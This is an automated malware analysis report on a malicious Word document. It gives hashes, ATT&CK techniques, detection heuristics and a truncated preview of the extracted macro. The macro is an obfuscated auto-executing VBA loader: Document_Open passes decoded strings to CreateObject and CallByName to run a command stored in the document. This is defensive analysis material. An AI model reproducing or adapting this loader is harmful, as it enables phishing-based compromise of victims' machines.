Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9e81657347bd10e9…

MALICIOUS

Office (OLE)

136.0 KB Created: 2018-10-23 00:06:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 6a82ee76b4079c545ed72fb4b8ea18f4 SHA-1: e979551b893342e7c8fe56613b9ad818ce4b5cb2 SHA-256: 9e81657347bd10e9f214b01e99089e7d9fba91194eab2745fe04ae7fa4db5fed
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is obfuscated and uses an auto-exec function (Document_Open) to initiate execution. The macro employs CreateObject and CallByName, indicative of attempts to execute arbitrary code. The ClamAV detection name 'Doc.Malware.Valyria-6749505-0' further confirms its malicious nature. The primary attack pattern involves leveraging the macro to execute a payload, likely for further system compromise.

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6749505-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6749505-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4564 bytes
SHA-256: 487dfaccb548302b003cdc4a47acdc6bfca27a5f1104f7de4311f2ce0b23b3e7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function SS_(ByVal KI_ As String)
Dim BF_ As String: Dim GD_ As Long: For GD_ = 1 To Len(KI_) Step 2: BF_ = BF_ & Chr(Val(Chr(23 + (9 * 2) - (1 * 3)) & Chr((20 * 3) + 16 - (24 / 2) + 8) & Mid(KI_, GD_, 2)) - 78): Next: SS_ = BF_
End Function
Sub Document_Open()
Dim JOUA_ As Long: JOUA_ = 78
Dim YUVMXF_ As Long
Select Case JOUA_
Case 54 Xor Round(3276 Xor 2145) Xor 9 - (16 + 78) - 57 * Round(17 / 54 - 93) * 50
YUVMXF_ = 8809 - 39
Case 35 + (60 - 95) + 85 / Round(37 * 39 / 14) / 89
YUVMXF_ = 8825 * 70
Case 62 + (39 - 66) + 49 - (96 + 53) - 40 / Round(84 * 89 / 26) / 20
YUVMXF_ = 4526 * 80
Case 14 - (49 + 26) - 60 Xor Round(2705 Xor 2547) Xor 79
YUVMXF_ = 3333 - 22
Case 68 Xor Round(1378 Xor 5970) Xor 41 + (60 - 54) + 25 Xor Round(38 Xor 71) Xor 20
YUVMXF_ = 5006 Xor 17
Case 25 / Round(71 * 97 / 94) / 93 - (52 + 55) - 13
YUVMXF_ = 2723 * 66
Case 14 - (21 + 88) - 71 Xor Round(59 Xor 3210) Xor 46 + (83 - 57) + 13
YUVMXF_ = 4341 / 37
Case 11 Xor Round(1506 Xor 1280) Xor 11 / Round(91 * 73 / 60) / 54 * Round(21 / 85 - 90) * 37
YUVMXF_ = 2203 / 96
Case 55 - (68 + 97) - 99 Xor Round(3252 Xor 1927) Xor 93
YUVMXF_ = 2601 - 85
Case 69 - (18 + 83) - 85 - (39 + 45) - 28
YUVMXF_ = 1482 - 15
Case 15 * Round(17 / 97 - 42) * 72 Xor Round(4436 Xor 5508) Xor 25 * Round(87 / 54 - 14) * 67
YUVMXF_ = 4929 * 86
Case 69 Xor Round(1612 Xor 3475) Xor 79 / Round(47 * 31 / 20) / 96
YUVMXF_ = 8631 / 71
Case 9 - (94 + 93) - 97 Xor Round(2692 Xor 4317) Xor 12 - (57 + 36) - 29
YUVMXF_ = 6863 + 19
Case 19 Xor Round(1116 Xor 2976) Xor 93 * Round(62 / 60 - 37) * 96 * Round(88 / 60 - 68) * 76
YUVMXF_ = 2907 * 12
Case 78:
CallByName CreateObject(SS_("A5A1B1C0B7BEC27CA1B6B3BABA")), SS_("A0C3BC"), VbMethod, SS_(ActiveDocument.Variables("LBVFFJHN").Value), 0, True
Case 22 / Round(83 * 76 / 86) / 26 * Round(30 / 89 - 78) * 47 * Round(13 / 86 - 43) * 95
YUVMXF_ = 6744 * 73
Case 48 / Round(9 * 95 / 81) / 64 Xor Round(4663 Xor 431) Xor 44
YUVMXF_ = 8150 / 75
Case 63 - (67 + 19) - 22 - (12 + 50) - 14
YUVMXF_ = 8351 + 63
Case 72 + (17 - 25) + 79 / Round(82 * 95 / 53) / 67
YUVMXF_ = 7701 Xor 65
Case 80 + (38 - 42) + 38 Xor Round(3502 Xor 5458) Xor 39 Xor Round(4539 Xor 4410) Xor 52
YUVMXF_ = 4757 * 70
Case 25 / Round(77 * 85 / 23) / 69 - (27 + 53) - 48 + (14 - 47) + 15
YUVMXF_ = 592 * 32
Case 87 + (82 - 12) + 77 + (38 - 52) + 95 * Round(36 / 60 - 61) * 57
YUVMXF_ = 7815 * 48
Case 86 + (80 - 69) + 13 + (48 - 17) + 43 Xor Round(859 Xor 4045) Xor 11
YUVMXF_ = 8383 + 29
Case 10 - (56 + 77) - 87 / Round(91 * 75 / 75) / 13
YUVMXF_ = 5472 Xor 70
Case 16 + (21 - 12) + 86 Xor Round(1721 Xor 2360) Xor 90 + (94 - 45) + 27
YUVMXF_ = 7675 / 87
Case 92 * Round(43 / 56 - 41) * 67 Xor Round(2898 Xor 4272) Xor 40 Xor Round(55 Xor 742) Xor 77
YUVMXF_ = 5889 + 66
Case 51 - (88 + 81) - 38 - (78 + 39) - 83 + (93 - 70) + 77
YUVMXF_ = 4521 * 31
Case 83 + (23 - 19) + 44 + (86 - 99) + 82 * Round(74 / 85 - 17) * 68
YUVMXF_ = 2933 / 52
Case 43 Xor Round(3262 Xor 484) Xor 49 * Round(22 / 53 - 43) * 89 * Round(19 / 73 - 70) * 93
YUVMXF_ = 2465 Xor 40
Case 41 - (84 + 68) - 87 - (50 + 14) - 99 / Round(34 * 51 / 37) / 66
YUVMXF_ = 3568 Xor 38
Case 65 * Round(98 / 94 - 89) * 43 - (91 + 12) - 55 Xor Round(4342 Xor 3691) Xor 40
YUVMXF_ = 2102 - 92
Case 69 * Round(47 / 28 - 65) * 22 * Round(54 / 71 - 17) * 13
YUVMXF_ = 3720 / 92
Case 88 Xor Round(448 Xor 4657) Xor 21 * Round(49 / 10 - 75) * 79 + (40 - 81) + 45
YUVMXF_ = 4673 * 70
Case 88 - (57 + 83) - 48 / Round(28 * 69 / 72) / 26
YUVMXF_ = 4384 Xor 61
Case 39 / Round(24 * 20 / 51) / 77 / Round(76 * 31 / 76) / 60
YUVMXF_ = 3680 - 18
Case 85 - (37 + 38) - 59 Xor Round(323 Xor 506) Xor 47 Xor Round(4196 Xor 4989) Xor 10
YUVMXF_ = 7878 Xor 63
Case 59 / Round(28 * 71 / 70) / 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.